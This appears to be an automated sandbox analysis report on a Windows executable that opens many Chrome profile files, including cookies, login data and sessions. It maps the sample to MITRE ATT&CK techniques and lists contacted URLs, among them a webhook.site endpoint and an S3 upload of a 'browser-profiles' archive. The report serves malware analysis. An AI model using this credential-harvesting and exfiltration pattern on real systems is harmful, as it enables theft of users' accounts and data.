Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PreferredApps	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PrivateAggregation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb\Docs.ico.md5	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\LOG.old	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\NetworkDataMigrated	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites-journal	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\Trust Tokens-journal	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG.old	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts-journal	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor-journal	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\index	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database-journal	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsSiteData-journal	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\Reporting and NEL-journal	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DIPS	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir\the-real-index	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsSiteData	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml\YouTube.ico	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\data_0	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Trust Tokens-journal	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\data_2	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\data_1	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Visited Links	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\data_3	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\LOG	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\QuotaManager	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm\Gmail.ico	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13340886963547611	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak\Google Drive.ico.md5	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data\data_1	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data\data_0	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data\data_3	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data\data_2	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\QuotaManager-journal	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\LOCK	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13340886963423997	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG.old	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Masquerading	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Modify Registry	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Virtualization/Sandbox Evasion	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Install Root Certificate	Cached Domain Credentials	21 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
5EvHHcMjRg.exe	17%	ReversingLabs
5EvHHcMjRg.exe	9%	Virustotal		Browse

Domains

Source	Detection	Scanner	Link
ipapi.co	0%	Virustotal	Browse
ap-southeast-1.wasabisys.com	0%	Virustotal	Browse
webhook.site	0%	Virustotal	Browse
s3.ap-southeast-1.wasabisys.com	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://login.microsoftonline.com/	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
https://drive-staging.corp.google.com/	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de51010101--09AZ__azhttps://webhook.site/efe66	0%	Avira URL Cloud	safe
https://drive-daily-2.corp.google.com/	0%	URL Reputation	safe
https://drive-autopush.corp.google.com/	0%	URL Reputation	safe
https://drive-daily-4.corp.google.com/	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://drive-daily-1.corp.google.com/	0%	URL Reputation	safe
https://drive-daily-5.corp.google.com/	0%	URL Reputation	safe
https://mail.google.com/mail/?usp=installed_webapp	0%	Avira URL Cloud	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://drive-daily-6.corp.google.com/	0%	URL Reputation	safe
https://docs.google.com/presentation/J	0%	Avira URL Cloud	safe
https://drive-daily-0.corp.google.com/	0%	URL Reputation	safe
https://mail.google.com/mail/installwebapp?usp=chrome_default	0%	Avira URL Cloud	safe
https://drive-preprod.corp.google.com/	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe
https://docs.google.com/document/J	0%	Avira URL Cloud	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://drive-daily-3.corp.google.com/	0%	URL Reputation	safe
https://drive.google.com/drive/installwebapp?usp=chrome_default	0%	Avira URL Cloud	safe
https://www.youtube.com/:	0%	Avira URL Cloud	safe
http://s3.amazonaws.com/doc/2006-03-01/	0%	Avira URL Cloud	safe
https://mail.google.com/mail/:	0%	Avira URL Cloud	safe
https://docs.google.com/document/installwebapp?usp=chrome_default	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=en	0%	Avira URL Cloud	safe
https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de5	0%	Avira URL Cloud	safe
https://docs.google.com/presentation/:	0%	Avira URL Cloud	safe
https://docs.google.com/presentation/installwebapp?usp=chrome_default	0%	Avira URL Cloud	safe
https://docs.google.com/	0%	Avira URL Cloud	safe
https://docs.google.com/document/:	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=enWeb	0%	Avira URL Cloud	safe
https://docs.google.com/spreadsheets/J	0%	Avira URL Cloud	safe
https://docs.google.com/spreadsheets/?usp=installed_webapp	0%	Avira URL Cloud	safe
https://mail.google.com/mail/J	0%	Avira URL Cloud	safe
https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240829212611-71434D56-1548-ED3D-AEE6-C75AECD93BF0.zip?uploadId=xegBsN0h7GK8TsbYHtXU_rFF4rPC2_2LH9Yu8_BPdoDoOFvXyLT4HBqv_zXSu7-SihvUH-HBZN3kGSnHfVKG4JBLZ0rDdIuUMtS9KUOhMcJseIl8xj753Ke9waxkTXK2	0%	Avira URL Cloud	safe
https://drive.google.com/	0%	Avira URL Cloud	safe
https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240829212611-71434D56-1548-ED3D-AEE6-C75AECD93BF0.zip?uploads=	0%	Avira URL Cloud	safe
https://docs.google.com/spreadsheets/:	0%	Avira URL Cloud	safe
https://drive.google.com/?lfhs=2	0%	Avira URL Cloud	safe
https://www.youtube.com/s/notifications/manifest/cr_install.html	0%	Avira URL Cloud	safe
https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de51010101	0%	Avira URL Cloud	safe
https://www.youtube.com/?feature=ytca	0%	Avira URL Cloud	safe
https://ipapi.co/json/	0%	Avira URL Cloud	safe
https://www.youtube.com/J	0%	Avira URL Cloud	safe
https://drive.google.com/:	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore	0%	Avira URL Cloud	safe
https://docs.google.com/spreadsheets/installwebapp?us	0%	Avira URL Cloud	safe
https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de51010101-	0%	Avira URL Cloud	safe
http://s3.amazonaws.com/doc/2006-03-01/ey	0%	Avira URL Cloud	safe
https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c1	0%	Avira URL Cloud	safe
https://drive.google.com/J	0%	Avira URL Cloud	safe
https://login.microsoftonline.com/savedusers?appid=ee272b19-4411-433f-8f28-5c13cb6fd407&wreply=https	0%	Avira URL Cloud	safe
https://mem.gfx.ms/	0%	Avira URL Cloud	safe
